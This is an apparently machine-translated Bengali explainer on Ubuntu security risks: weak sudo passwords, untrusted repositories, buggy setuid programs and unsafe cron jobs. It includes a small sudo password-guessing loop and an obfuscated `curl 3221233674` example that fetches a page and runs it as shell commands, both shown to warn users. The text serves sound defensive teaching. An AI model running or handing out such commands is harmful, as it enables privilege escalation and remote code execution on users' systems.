রুট পাসওয়ার্ড নিজেই ক্র্যাক করা সম্ভব নয়, কারণ উবুন্টু ডিফল্টরূপে রুট ব্যবহারকারীকে অক্ষম করে। তবে, যদি আপনার ব্যবহারকারী সুডোর মাধ্যমে রুট হয়ে উঠতে পারে এবং আপনার পাসওয়ার্ডটি অনুমান করা / ব্রুট ফোর্স করা সহজ হয় তবে আপনি একটি অনিরাপদ সিস্টেম। উদাহরণস্বরূপ স্ক্রিপ্ট কিছু পাসওয়ার্ড পরীক্ষা করার চেষ্টা করছে:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
একটি অবিশ্বস্ত সংগ্রহস্থল যুক্ত করার ফলে সেই সংগ্রহস্থল থেকে প্রোগ্রাম ইনস্টল করা যায়। এমনকি যদি আপনি স্পষ্টভাবে কোনও অ্যাপ্লিকেশন ইনস্টল না করেন তবে sudo apt-get install [app-from-repo], উবুন্টুকে বিশ্বাস করাতে যে সংগ্রহস্থলটি একটি নির্দিষ্ট প্রোগ্রামের একটি নতুন সংস্করণ রয়েছে তারপরেও সংগ্রহশালাটি অন্যান্য প্রোগ্রামগুলিকে প্রভাবিত করতে পারে।
আপডেট প্রক্রিয়াটি মূল হিসাবে চালিত হয়, অন্যথায় ফাইলগুলিতে /usr/binবা লেখা যায়নি /etc। একটি ইনস্টলেশন ট্রিগার রুট হিসাবে চালানো হয় এবং নির্বিচারে এবং সম্ভবত ক্ষতিকারক কমান্ড চালাতে পারে। এখন, উদ্বিগ্ন হবেন না, প্রোগ্রামগুলি আপডেট করার জন্য ম্যানুয়াল অ্যাকশন প্রয়োজন এবং উবুন্টু সংগ্রহস্থলগুলি নিরাপদ। উইন্ডোজের মতো বন্ধ-উত্স সফ্টওয়্যারটি কখনই পুরোপুরি বিশ্বাসযোগ্য হতে পারে না কারণ আপনি দূষিত কোডের উত্সটি পরীক্ষা করতে পারবেন না, তবে আপনার প্রয়োজন হলে উবুন্টু অ্যাপ্লিকেশনটির উত্সটি পর্যালোচনা করতে পারেন (যেমন sun-java6ফ্ল্যাশের মতো মালিকানাধীন প্রোগ্রামগুলিতে প্রয়োগ হয় না )।
জাভিয়ের রিভেরার উল্লেখ অনুসারে, কার্নেল বাগগুলি নির্বিচারে কোড কার্যকর করতে পারে, তবে বাগড সফ্টওয়্যার সম্ভবত বিপজ্জনক, বিশেষত বগি setsuidরুট বাইনারি (বাইনারি যা ফাইলের মালিকের অধীনে চলবে) এবং অন্যান্য বগি প্রোগ্রামগুলি রুট হিসাবে চলমান।
আপনি কী করছেন সেদিকে মনোযোগ না দিলে আপনি আপনার সিস্টেমে সুরক্ষা গর্ত তৈরি করতে পারেন। উদাহরণস্বরূপ, ক্রোনজবসের ধারণাটি পুরোপুরি না বুঝে আপনি একটি ক্রোনজ যুক্ত করেছেন /etc/cron.dailyযা আপনার বাড়ির ফোল্ডারে একটি প্রোগ্রাম চালায় (যেমন, /bin/sh /home/your-username/myscript.shযদি ম্যাসক্রিপ্ট.শ ফাইলটি আপনার দ্বারা মুছে ফেলা যায় তবে কোনও শোষণ দূষিত করে ফেলতে পারে কোড myscript.shযা মূল হিসাবে চালিত হবে (সুবিধাবদ্ধতা বৃদ্ধি)।
নিরাপদে থাকার জন্য, আপনার মন ব্যবহার করুন! অবিশ্বস্ত উত্স থেকে কমান্ডগুলি চালাবেন না যদি আপনি না জানেন তবে এটি কী করে। যদি কেউ বলে যে `curl 3221233674`ব্যাক-টিক দিয়ে চালাও, তবে করবেন না। 3221233674 হ'ল লেখার আরেকটি উপায় 192.0.32.10(উদাহরণ ডটকমের আইপি)। সুতরাং, এটি সমান হবে:
`curl http://example.com/`
এই ব্যাক-টিকগুলির ফলে আউটপুটটি শেল কমান্ড হিসাবে কার্যকর হয়। সরল ইংরেজিতে, "পৃষ্ঠাটি http://example.com/ ডাউনলোড করুন এবং ডাউনলোডকৃত পৃষ্ঠাটি কার্যকর করার চেষ্টা করুন"।
প্রথমে, আপনি প্রদত্ত কমান্ডটিতে দূষিত কিছু দেখতে পাবেন না। তবে এখন, আপনি জানেন যে এটিরও অপব্যবহার করা যেতে পারে।
ইন্টারনেটের মতো অবিশ্বস্ত উত্স থেকে আপনি সর্বদা কমান্ড / স্ক্রিপ্টটি পরীক্ষা করুন।